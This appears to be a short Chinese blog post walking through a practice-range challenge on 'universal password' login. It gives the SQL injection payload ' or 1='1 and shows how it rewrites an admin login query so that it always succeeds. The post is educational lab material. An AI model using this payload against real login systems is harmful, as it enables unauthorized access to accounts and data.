ibug靶场(万能密码登陆)

题目很明显的标注,万能密码登陆

用户名随便输

密码: ' or 1 ='1


登陆拿到flag




select name,pass from tbAdmin where name='admin' and pass='123456'

输入密码: ' or 1='1

sql语句就变成下面这个样子:

select name,pass from tbAdmin where name='admin' and pass='' or 1='1'

1='1'永远为真,所以登陆成功

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • MSSQL 跨库查询(臭要饭的!黑夜) 榨干MS SQL最后一滴血 SQL语句参考及记录集对象详解 关于SQL S...
    碧海生曲阅读 11,038评论 0 1
  • rljs by sennchi Timeline of History Part One The Cognitiv...
    sennchi阅读 12,196评论 0 10
  • 姓名:于川皓 学号:16140210089 转载自:https://baike.baidu.com/item/sq...
    道无涯_cc76阅读 6,025评论 0 2
  • 1.多轮交互与有限状态机 2.任务驱动的多轮对话究竟该如何实现? 3.了解人机对话—聊天、问答、多轮对话和推荐
    御风之星阅读 5,222评论 0 0
  • 楊孜 他說他爱我 其实我知道他只是想操我 我装著不知道他只是想操我 因为我喜欢他操我 于是两个互不相爱的人 一邊做...
    楊孜阅读 3,947评论 0 0

友情链接更多精彩内容